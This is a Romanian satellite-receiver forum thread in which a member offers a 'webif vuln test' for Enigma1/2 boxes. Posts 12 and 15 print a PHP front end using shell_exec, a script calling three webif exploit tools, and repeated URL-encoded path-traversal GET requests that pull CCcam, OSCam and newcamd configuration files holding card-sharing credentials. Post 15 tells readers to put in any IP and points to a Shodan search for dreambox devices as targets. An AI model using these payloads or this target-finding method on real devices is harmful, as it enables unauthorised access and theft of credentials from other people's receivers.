Results 1 to 15 of 15

Thread: Enigma1/2 WEBIF VULN TEST

  1. #1
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    386
    Mentioned
    2 Post(s)
    Rep Power
    53

    Default Enigma1/2 WEBIF VULN TEST

    Daca iti apare config-ul de la cccam sau oscam dupa ce apesi pe Submit Query! Blocheaza-ti portul 80 sau schimba-ti imaginea cu una mai noua.
    Merge testat doar daca cutia e pe acelasi ip(extern) cu PC ex: pc si dm ies pe net printr-un router si portul 80 are forward catre dm!
    TEST AICI!!

  2. #2
    RSP - TEAM zildan's Avatar
    Join Date
    05 Dec 2007
    Location
    Sudul Romaniei
    Posts
    8,978
    Mentioned
    115 Post(s)
    Rep Power
    100

    Default

    Adica le iei deja configurile cand fac testul?
    Sh40, AML, prime focus 1,5m si altele ...

  3. #3
    Moderator Super konstantine's Avatar
    Join Date
    18 Apr 2008
    Location
    Sudul României
    Posts
    2,316
    Mentioned
    85 Post(s)
    Rep Power
    100

    Default

    Dar daca folosesc un firewall standalone (hardware ,in care by rulles blochez porturile vulnerabile) mai poate exista vreo problema?

  4. #4
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    386
    Mentioned
    2 Post(s)
    Rep Power
    53

    Default

    Daca folosesti fw sau ai porturile blocate din router nu merge..dar multi au cutia pusa in dmz(probabil de lene sa faca un forward la un port)
    Scriptul nu salveaza configurile le face print pe ecran si atat...il foloseste cine vrea....
    RSR Cache Blaster!

  5. #5
    Moderator Super konstantine's Avatar
    Join Date
    18 Apr 2008
    Location
    Sudul României
    Posts
    2,316
    Mentioned
    85 Post(s)
    Rep Power
    100

    Default

    Preventiv am firewall hardware,localu' il am indoor asa ca "e grele" Si la net,ies prin 3 routere...Cica prevederea e mama intelepciunii...

    http://www.canyouseeme.org/
    Last edited by konstantine; 01-03-14 at 10:42.

  6. #6
    bennykoo
    Guest

    Default

    deci daca testu-i negativ,e de bine?

  7. #7
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    386
    Mentioned
    2 Post(s)
    Rep Power
    53

    Default

    daca nu apare cfg da e de bine...inseamna ca nu te pot arde pe webif..decat pe ssh,telnet,stream daca sunt deschise
    RSR Cache Blaster!

  8. #8
    Standard RSP member djczefre's Avatar
    Join Date
    09 Oct 2010
    Posts
    277
    Mentioned
    0 Post(s)
    Rep Power
    57

    Default

    E buna dresa asta (lynk) ? Mie i-mi da eroare!

  9. #9
    RSP - TEAM zildan's Avatar
    Join Date
    05 Dec 2007
    Location
    Sudul Romaniei
    Posts
    8,978
    Mentioned
    115 Post(s)
    Rep Power
    100

    Default

    Am operat-o eu.
    Sh40, AML, prime focus 1,5m si altele ...

  10. #10
    Standard RSP member djczefre's Avatar
    Join Date
    09 Oct 2010
    Posts
    277
    Mentioned
    0 Post(s)
    Rep Power
    57

    Default

    Pana la urma nu inteleg nimica. Deci mai pot face test undeva s-au nu are rost! La mine apare pagine inexistenta! Sunt dupa router .Ro.

    S-au @puidezmeu face figuri si cu aceasta metoda de test face prostii adica fura liniile direkt pt. el ? Sincer eu m-am pierdut!
    Last edited by djczefre; 02-03-14 at 12:46.

  11. #11
    RSP - TEAM zildan's Avatar
    Join Date
    05 Dec 2007
    Location
    Sudul Romaniei
    Posts
    8,978
    Mentioned
    115 Post(s)
    Rep Power
    100

    Default

    Daca pune sursa aici in clar ii dam drumu.
    Ti-ai raspuns singur la intrebari.
    Sh40, AML, prime focus 1,5m si altele ...

  12. #12
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    386
    Mentioned
    2 Post(s)
    Rep Power
    53

    Default

    ce crezi ca se vede in sursa?
    are un shell_exec..la un script..
    Code:
    <?php
    echo '
    <html>
    <body>
    <br>BEBELUSUL webif tester beta1 using 5 public webif e x p l o i t s!!!.
    <form action="'.htmlentities($_SERVER['PHP_SELF']).'" method="post">
    Test your STB: <input type="hidden" name="aaa" value='.$_SERVER['REMOTE_ADDR'].' readonly>
    <input type="submit">
    </form>
    </body>';
    if (isset($_POST["aaa"]) && !empty($_POST["aaa"])) {
    $host = $_POST['aaa'];
    $cmd= "/x/mar/UTILS/webz $host";
    $output = shell_exec($cmd);
    echo "<pre>$output</pre>";
    
    
    }
    ?>
    Code:
    echo "######################    $1       #####################"
     /x/mar/UTILS/web1 $1 /var/etc/CCcam.cfg
     /x/mar/UTILS/web1 $1 /var/keys/newcamd.list
     /x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.server
     /x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.conf
     /x/mar/UTILS/web1 $1 /var/tuxbox/config/newcamd.conf
     /x/mar/UTILS/web2 $1 /var/etc/CCcam.cfg
     /x/mar/UTILS/web2 $1 /var/keys/newcamd.list
     /x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.server
     /x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.conf
     /x/mar/UTILS/web2 $1 /var/tuxbox/config/newcamd.conf
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc%2FCCcam.cfg
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.list
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.server
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.conf
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.conf
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.server
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.conf
    
    
    /x/mar/UTILS/web3 $1
    web1 web2 web3 sunt exploituri pt webif(le gasiti pe google)
    DJ-HU stiu ca crapa pipota in tine de cand ti-am taiat liniile ...dar asta e..testeaza-ti tu cutia la calorifer sau cu un ciocan!
    Se poate sterge thread-ul!

  13. #13
    RSP - TEAM zildan's Avatar
    Join Date
    05 Dec 2007
    Location
    Sudul Romaniei
    Posts
    8,978
    Mentioned
    115 Post(s)
    Rep Power
    100

    Default

    Am refacut lynk-ul.
    Sh40, AML, prime focus 1,5m si altele ...

  14. #14
    Standard RSP member Diablo1's Avatar
    Join Date
    29 Mar 2009
    Location
    Austria - TM
    Posts
    1,869
    Mentioned
    0 Post(s)
    Rep Power
    78

    Default

    Merge

    LWP::Protocol::http::Socket: connect: No route to host at /usr/share/perl5/LWP/Protocol/http.pm line 51.
    Can't connect to 90.110.192.142:80 (No route to host)

  15. #15
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    386
    Mentioned
    2 Post(s)
    Rep Power
    53

    Default

    Sa va invat prostii..
    Code:
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc%2FCCcam.cfg
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.list
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.server
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.conf
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.conf
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.server
    GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.conf
    Aici se poate inlocui $1 cu IP se baga in explorer(fara GET)..daca vreti sa testati alt ip...
    Pentru a testa se poate lua un ip din lista de mai jos....
    Code:
    http://www.shodanhq.com/search?q=dreambox

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •